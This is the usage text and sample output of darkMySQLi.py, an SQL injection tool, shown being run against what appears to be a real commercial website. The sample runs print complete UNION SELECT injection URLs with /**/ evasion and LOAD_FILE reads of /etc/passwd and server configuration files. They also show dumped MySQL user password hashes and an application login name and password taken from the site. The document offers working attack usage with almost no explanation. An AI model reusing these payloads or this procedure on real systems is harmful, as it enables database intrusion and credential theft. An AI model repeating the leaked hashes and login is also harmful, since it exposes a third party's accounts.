darkMySQLi v.1.0 rsauron@gmail.com

Usage: ./darkMySQLi.py [options]

Options:
  -h, --help           shows this help message and exits
  -d, --debug          display URL debug information

  Target:
    -u URL, --url=URL  Target url

  Methodology:
    -b, --blind        Use blind methodology (req: --string)
    -s, --string       String to match in page when the query is valid

  Method:
    --method=PUT       Select to use PUT method

  Modes:
    --dbs              Enumerate databases                      MySQL v5+
    --schema           Enumerate Information_schema (req: -D,
                       opt: -T)                                 MySQL v5+
    --full             Enumerate all we can                     MySQL v5+
    --info             MySQL Server configuration               MySQL v4+
    --fuzz             Fuzz Tables & Columns Names              MySQL v4+
    --findcol          Find Column length                       MySQL v4+
    --dump             Dump database table entries (req: -T,
                       opt: -D, -C, --start, --stop)            MySQL v4+

  Define:
    -D DB              database to enumerate
    -T TBL             database table to enumerate
    -C COL             database table column to enumerate

  Optional:
    --where=COL,VALUE  Use a where clause in your dump
    --orderby=COL      Use a orderby clause in your dump
    --proxy=PROXY      Use a HTTP proxy to connect to the target url
    --output=FILE.TXT  Output results of tool to this file

Examples:
darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10" --info
|--------------------------------------------------|
| rsauron@gmail.com v1.0 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10
[+] 14:06:17
[+] Evasion: /**/ --
[+] Cookie: None
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: db2889_rayner_en
User: mysql2889@localhost
Version: 5.0.32-Debian_7etch1-log
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+FROM+mysql.user--
[+] Dumping MySQL user info. host:user:password
[+] Number of users in the mysql.user table: 6
[0] localhost:root:N
[1] dlx35341:root:N
[2] localhost:debian-sys-maint:*0EF29B1AED94CC60062FED7F4DF2224A0C880A10
[3] localhost:mysql2908:*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
[4] localhost:mysql2970:*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
[5] localhost:mysql2889:*8050739003BBDB60551FA99B5FFF34957C4F5F49
[+] Do we have Access to Load_File: YES <-- w00t w00t
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10--
[+] Magic quotes are: OFF
[+] Starting Load_File Fuzzer...
[+] Number of system files to be fuzzed: 37
[!] Found /etc/passwd
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10--
[!] Found /etc/hosts
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6,7,8,9,10--
[!] Found /etc/motd
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6,7,8,9,10--
[!] Found /etc/apache2/apache2.conf
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f617061636865322e636f6e66),3,4,5,6,7,8,9,10--
[!] Found /etc/apache2/httpd.conf
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f68747470642e636f6e66),3,4,5,6,7,8,9,10--
[!] Found /etc/apache2/sites-available/default
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f73697465732d617661696c61626c652f64656661756c74),3,4,5,6,7,8,9,10--
[!] Found /etc/mysql/my.cnf
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d7973716c2f6d792e636e66),3,4,5,6,7,8,9,10--
[-] 14:06:43
[-] Total URL Requests: 48
[-] Done

Table dump with the where clause option and debug turned on:
darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10" --dump -D db2889_rayner_en -T auth -C name,pass --where pass,ridley --debug
|--------------------------------------------------|
| rsauron@gmail.com v1.0 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10
[+] 14:17:43
[+] Evasion: /**/ --
[+] Cookie: None
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x6461726b63306465,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x6461726b63306465),3,4,5,6,7,8,9,10--
Database: db2889_rayner_en
User: mysql2889@localhost
Version: 5.0.32-Debian_7etch1-log
[+] Dumping data from database "db2889_rayner_en" Table "auth"
[+] and Column(s) ['name', 'pass']
[+] WHERE clause: WHERE+pass=0x7269646c6579
[+] ORDERBY clause:
[debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,COUNT(*),0x1e,0x20),3,4,5,6,7,8,9,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579--
[+] Number of Rows: 1
[debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,name,0x1e,pass,0x1e,0x1e,0x20),3,4,5,6,7,8,9,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579/**//**/LIMIT/**/0,1--
[1] rayneriol:ridley:
[-] 14:17:45
[-] Total URL Requests: 3
[-] Done

For detailed usage, see the tool's help output.